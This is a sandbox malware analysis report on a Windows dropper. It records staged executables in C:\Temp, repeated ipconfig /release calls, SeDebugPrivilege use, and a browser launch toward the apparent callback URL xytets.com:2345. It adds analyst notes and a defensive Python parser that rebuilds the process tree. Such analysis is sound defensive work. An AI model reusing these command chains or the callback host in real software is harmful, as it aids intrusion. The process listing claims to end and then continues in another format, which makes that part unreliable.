Malware Analysis Report

2025-08-05 16:57

Sample ID 250127-zcqsgsvpaq
Target JaffaCakes118_437309d104ca341348f98d56425358fc
SHA256 6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
Tags: discovery
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 7/10
SHA256: 6d131c347e95abc7aedf92773ee5b94593279c62bf02528365544a663bf0826c
Threat Level: Shows suspicious behavior

The file JaffaCakes118_437309d104ca341348f98d56425358fc was found to be: Shows suspicious behavior.

Malicious Activity Summary

Tags: discovery

Executes dropped EXE

Loads dropped DLL

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Gathers network information

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15 (the matrix view is not included in this text). The only technique the report's signatures name explicitly is System Location Discovery: System Language Discovery (T1614.001).

Analysis: static1

Detonation Overview

Reported

2025-01-27 20:34

Signatures

Unsigned PE

No description, indicator, process or target recorded for this signature.

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-27 20:34

Reported

2025-01-27 20:37

Platform

win7-20241010-en

Max time kernel

150s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

Signatures

Executes dropped EXE

Process (description, indicator and target not recorded; rows in the order reported):
C:\Temp\ojgbvtnlgaysqkfd.exe
C:\temp\CreateProcess.exe
C:\Temp\pkecwupjey.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_pkecwupjey.exe
C:\temp\CreateProcess.exe
C:\Temp\lgeysqlidx.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_lgeysqlidx.exe
C:\temp\CreateProcess.exe
C:\Temp\cxrpkhcwuo.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_cxrpkhcwuo.exe
C:\temp\CreateProcess.exe
C:\Temp\wupjhbztom.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_wupjhbztom.exe
C:\temp\CreateProcess.exe
C:\Temp\wqojgbvtnl.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_wqojgbvtnl.exe
C:\temp\CreateProcess.exe
C:\Temp\nlfaysqkfc.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_nlfaysqkfc.exe
C:\temp\CreateProcess.exe
C:\Temp\caupmhfzur.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_caupmhfzur.exe
C:\temp\CreateProcess.exe
C:\Temp\rmgeywrljd.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_rmgeywrljd.exe
C:\temp\CreateProcess.exe
C:\Temp\olgeysqlid.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_olgeysqlid.exe
C:\temp\CreateProcess.exe
C:\Temp\vsnhfzxsmk.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_vsnhfzxsmk.exe
C:\temp\CreateProcess.exe
C:\Temp\usmhezxrmj.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_usmhezxrmj.exe
C:\temp\CreateProcess.exe
C:\Temp\ojhbztolge.exe
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe
C:\Temp\i_ojhbztolge.exe
C:\temp\CreateProcess.exe
C:\Temp\dysqlidxvp.exe
C:\temp\CreateProcess.exe

Loads dropped DLL

Process (description, indicator and target not recorded; x2 = two consecutive rows):
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\pkecwupjey.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\lgeysqlidx.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\cxrpkhcwuo.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\wupjhbztom.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\wqojgbvtnl.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\nlfaysqkfc.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\caupmhfzur.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\rmgeywrljd.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\olgeysqlid.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\vsnhfzxsmk.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\usmhezxrmj.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\ojhbztolge.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\dysqlidxvp.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\axsqkfcxup.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\usmkezwrpj.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\trmgeywqlj.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\wqlidbvqni.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\ysnlfdxspk.exe
C:\Temp\ojgbvtnlgaysqkfd.exe (x2)
C:\Temp\upnhczusmg.exe
C:\Temp\ojgbvtnlgaysqkfd.exe

System Location Discovery: System Language Discovery

Tags: discovery
Indicator (every row): Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Description and target not recorded. Processes:
C:\Temp\rmgeywrljd.exe
C:\Temp\ysnlfdxspk.exe
C:\Temp\upnhczusmg.exe
C:\Temp\wqojgbvtnl.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Temp\ojgbvtnlgaysqkfd.exe
C:\Temp\caupmhfzur.exe
C:\Temp\olgeysqlid.exe
C:\Temp\vsnhfzxsmk.exe
C:\Temp\axsqkfcxup.exe
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
C:\Temp\lgeysqlidx.exe
C:\Temp\cxrpkhcwuo.exe
C:\Temp\wupjhbztom.exe
C:\Temp\nlfaysqkfc.exe
C:\Temp\usmhezxrmj.exe
C:\Temp\dysqlidxvp.exe
C:\Temp\trmgeywqlj.exe
C:\Temp\pkecwupjey.exe
C:\Temp\wqlidbvqni.exe
C:\Temp\usmkezwrpj.exe
C:\Temp\ojhbztolge.exe

Windows reads this key whenever a process queries locale information, which is why IEXPLORE.EXE itself appears in the list. Treat this signature as context for the discovery tag, not as an indicator on its own.

Modifies Internet Explorer settings

Tags: adware, spyware
Columns: Description | Indicator | Process | Target (N/A = not recorded). Every key below is under \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer.

All of these writes are made by iexplore.exe itself after the sample launched it against http://xytets.com:2345/t.asp?os=home (see Processes). Values such as TabbedBrowsing\NTPFirstRun = "1", Recovery\AdminActive, Main\Window_Placement and WindowsSearch\Version = "WS not running" are the browser's own first-run and session-recovery housekeeping rather than settings changed by the sample; the indicator worth keeping from this section is the browser launch toward xytets.com:2345, not these keys.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444171956" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{252E1941-DCEE-11EF-8121-F6D98E36DBEF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (value not shown) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d48ee11fb50b40b431f9f144d107fb000000000200000000001066000000010000200000002778afc389a971e62ac9d1793352ec25bba45f86875d5a60268291980440ec52000000000e80000000020000200000007c9293987ed2dbc789a5101332c660cc9283f003b18e359266451779b42f409d200000006b1563f77b3c808b9082ced6487c6cc20dae70a80af71732660ebeb84a78d1e740000000dae63e5b7fdbf2e4496d6a91a5cf28b80a9702f159b8c47697988b2c84ee59f7f77077e98ebe67b38291ce0ed714180cb4673c7a970153549947385bf63dbaab C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0af18fdfa70db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Process (description, indicator and target not recorded; number of matching rows in parentheses):
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe (28)
C:\Temp\ojgbvtnlgaysqkfd.exe (7)
C:\Temp\pkecwupjey.exe (7)
C:\Temp\i_pkecwupjey.exe (7)
C:\Temp\lgeysqlidx.exe (7)
C:\Temp\i_lgeysqlidx.exe (7)
C:\Temp\cxrpkhcwuo.exe (1; the table ends here)

Suspicious behavior: LoadsDriver

20 matches, none with a description, indicator, process or target recorded, so the hit cannot be attributed to a specific process from this page.

Suspicious use of AdjustPrivilegeToken

Description (every row): Token: SeDebugPrivilege. Indicator and target not recorded. Processes:
C:\Temp\i_pkecwupjey.exe
C:\Temp\i_lgeysqlidx.exe
C:\Temp\i_cxrpkhcwuo.exe
C:\Temp\i_wupjhbztom.exe
C:\Temp\i_wqojgbvtnl.exe
C:\Temp\i_nlfaysqkfc.exe
C:\Temp\i_caupmhfzur.exe
C:\Temp\i_rmgeywrljd.exe
C:\Temp\i_olgeysqlid.exe
C:\Temp\i_vsnhfzxsmk.exe
C:\Temp\i_usmhezxrmj.exe
C:\Temp\i_ojhbztolge.exe
C:\Temp\i_dysqlidxvp.exe
C:\Temp\i_axsqkfcxup.exe
C:\Temp\i_usmkezwrpj.exe
C:\Temp\i_trmgeywqlj.exe
C:\Temp\i_wqlidbvqni.exe
C:\Temp\i_ysnlfdxspk.exe
C:\Temp\i_upnhczusmg.exe

Only the i_<name>.exe binaries (the ups_ins stage in the process listing) enable SeDebugPrivilege; their <name>.exe ups_run counterparts do not appear here. AdjustTokenPrivileges can only enable a privilege the token already holds, so this is not an escalation by itself; it signals that the installer stage expects to open handles to other processes.

Suspicious use of FindShellTrayWindow

Process: C:\Program Files\Internet Explorer\iexplore.exe (description, indicator and target not recorded)

Suspicious use of WriteProcessMemory

Each source/target pair appears four times in the report; it is listed once here with the write count. Indicator not recorded.
PID 2608 wrote to memory of 636 (x4): C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe -> C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 2176 (x4): C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe -> C:\Program Files\Internet Explorer\iexplore.exe
PID 2176 wrote to memory of 2148 (x4): C:\Program Files\Internet Explorer\iexplore.exe -> C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 636 wrote to memory of 2676 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 2292 wrote to memory of 2840 (x4): C:\Temp\pkecwupjey.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2732 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2708 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 1040 wrote to memory of 2852 (x4): C:\Temp\lgeysqlidx.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 236 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 1584 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 3040 wrote to memory of 2536 (x4): C:\Temp\cxrpkhcwuo.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 788 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2440 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 2272 wrote to memory of 1236 (x4): C:\Temp\wupjhbztom.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2640 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2772 (x4): C:\Temp\ojgbvtnlgaysqkfd.exe -> C:\temp\CreateProcess.exe

In every row the target is a child the source has just created, and the same four-write pattern shows up when iexplore.exe (2176) starts its own x86 tab process (2148). These entries therefore record process creation on this platform, not injection into an unrelated process. Note that the stage binaries (2292, 1040, 3040, 2272) appear as sources while their own creation by CreateProcess.exe is not in this table.
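The table above records who wrote into whom, not the process tree that implies, and every pair is repeated four times. The following Python is an added example, not part of the sandbox report or its tooling: it parses rows in the report's own text layout (a constructed subset is embedded, with the four-fold repetition kept for the first pair), collapses the repeats into a per-edge write count, and prints the tree, marking any PID that appears as a writer without a recorded parent. The row regex and the assumption that the two image paths can be split on the whitespace before a drive letter are taken from how this page is laid out.

```python
"""Rebuild the process tree implied by a 'Suspicious use of WriteProcessMemory' table.

Added example; the sandbox report does not ship this code. Rows follow the text
layout of the table on this page (assumption):
    PID <src> wrote to memory of <dst> N/A <source image> <target image>
"""
import re
from collections import defaultdict

# Constructed input: a subset of the table above. The report repeats each pair
# four times; only the first pair is reproduced four times here to keep it short.
SAMPLE_ROWS = r"""
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\ojgbvtnlgaysqkfd.exe
PID 2608 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2176 wrote to memory of 2148 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 636 wrote to memory of 2676 N/A C:\Temp\ojgbvtnlgaysqkfd.exe C:\temp\CreateProcess.exe
PID 2292 wrote to memory of 2840 N/A C:\Temp\pkecwupjey.exe C:\temp\CreateProcess.exe
PID 636 wrote to memory of 2732 N/A C:\Temp\ojgbvtnlgaysqkfd.exe C:\temp\CreateProcess.exe
PID 1040 wrote to memory of 2852 N/A C:\Temp\lgeysqlidx.exe C:\temp\CreateProcess.exe
"""

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+)$")
# Two image paths follow the N/A; each starts with a drive letter, so split on the
# whitespace that precedes "X:\" (paths like "C:\Program Files\..." contain spaces
# but never an embedded " X:\").
PATH_SPLIT_RE = re.compile(r"\s+(?=[A-Za-z]:\\)")


def parse_rows(text):
    """Return one (src_pid, dst_pid, src_image, dst_image) tuple per table row."""
    records = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # header or anything that is not a WriteProcessMemory row
        paths = PATH_SPLIT_RE.split(m.group(3).strip())
        if len(paths) != 2:
            raise ValueError(f"could not split source/target image: {line!r}")
        records.append((int(m.group(1)), int(m.group(2)), paths[0], paths[1]))
    return records


def build_tree(records):
    """Collapse duplicate rows into parent map, children map, image map and per-edge write counts."""
    parent, image, writes = {}, {}, defaultdict(int)
    children = defaultdict(list)
    for src, dst, src_img, dst_img in records:
        image.setdefault(src, src_img)
        image.setdefault(dst, dst_img)
        if dst not in parent:          # first sighting of this child fixes its parent
            parent[dst] = src
            children[src].append(dst)
        writes[(src, dst)] += 1
    return parent, dict(children), image, dict(writes)


def roots(parent, image):
    """PIDs nobody wrote into: the sample itself, plus any process whose creation
    the (capped) table does not record."""
    return [pid for pid in image if pid not in parent]


def render(parent, children, image, writes):
    """Indented text tree, one line per process, with the write count on each edge."""
    lines = []

    def walk(pid, depth):
        if pid in parent:
            note = f"  ({writes[(parent[pid], pid)]} writes from PID {parent[pid]})"
        else:
            note = "  (no recorded parent)"
        lines.append("  " * depth + f"PID {pid} {image[pid]}{note}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for pid in roots(parent, image):
        walk(pid, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(*build_tree(parse_rows(SAMPLE_ROWS))))
```

Run as a script to print the tree. On the sample rows the stage binaries 2292 and 1040 come out as roots with no recorded parent: the rows in which CreateProcess.exe spawned them are absent from the report, which is exactly the gap the reconstruction makes visible.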

Processes

One line per process, in the order reported; the image path of each process is the first token of its command line. The chain is: the sample starts C:\Temp\ojgbvtnlgaysqkfd.exe with the argument run and opens Internet Explorer on http://xytets.com:2345/t.asp?os=home; ojgbvtnlgaysqkfd.exe and the stage binaries then drive, through C:\temp\CreateProcess.exe, a three-step cycle per ten-letter stage name: <name>.exe ups_run, ipconfig.exe /release, i_<name>.exe ups_ins (parent/child links are in the WriteProcessMemory table).

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\ojgbvtnlgaysqkfd.exe run
"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2
C:\temp\CreateProcess.exe C:\Temp\pkecwupjey.exe ups_run
C:\Temp\pkecwupjey.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_pkecwupjey.exe ups_ins
C:\Temp\i_pkecwupjey.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run
C:\Temp\lgeysqlidx.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins
C:\Temp\i_lgeysqlidx.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\cxrpkhcwuo.exe ups_run
C:\Temp\cxrpkhcwuo.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\Temp\i_cxrpkhcwuo.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\wupjhbztom.exe ups_run
C:\Temp\wupjhbztom.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_wupjhbztom.exe ups_ins
C:\Temp\i_wupjhbztom.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\wqojgbvtnl.exe ups_run
C:\Temp\wqojgbvtnl.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\Temp\i_wqojgbvtnl.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\nlfaysqkfc.exe ups_run
C:\Temp\nlfaysqkfc.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\Temp\i_nlfaysqkfc.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\caupmhfzur.exe ups_run
C:\Temp\caupmhfzur.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_caupmhfzur.exe ups_ins
C:\Temp\i_caupmhfzur.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\rmgeywrljd.exe ups_run
C:\Temp\rmgeywrljd.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_rmgeywrljd.exe ups_ins
C:\Temp\i_rmgeywrljd.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\olgeysqlid.exe ups_run
C:\Temp\olgeysqlid.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_olgeysqlid.exe ups_ins
C:\Temp\i_olgeysqlid.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\vsnhfzxsmk.exe ups_run
C:\Temp\vsnhfzxsmk.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\Temp\i_vsnhfzxsmk.exe ups_ins
C:\temp\CreateProcess.exe C:\Temp\usmhezxrmj.exe ups_run
C:\Temp\usmhezxrmj.exe ups_run
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe C:\Temp\i_usmhezxrmj.exe ups_ins
C:\Temp\i_usmhezxrmj.exe (the listing ends here)

C:\Temp\i_usmhezxrmj.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ojhbztolge.exe ups_run

C:\Temp\ojhbztolge.exe

C:\Temp\ojhbztolge.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ojhbztolge.exe ups_ins

C:\Temp\i_ojhbztolge.exe

C:\Temp\i_ojhbztolge.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\dysqlidxvp.exe ups_run

C:\Temp\dysqlidxvp.exe

C:\Temp\dysqlidxvp.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

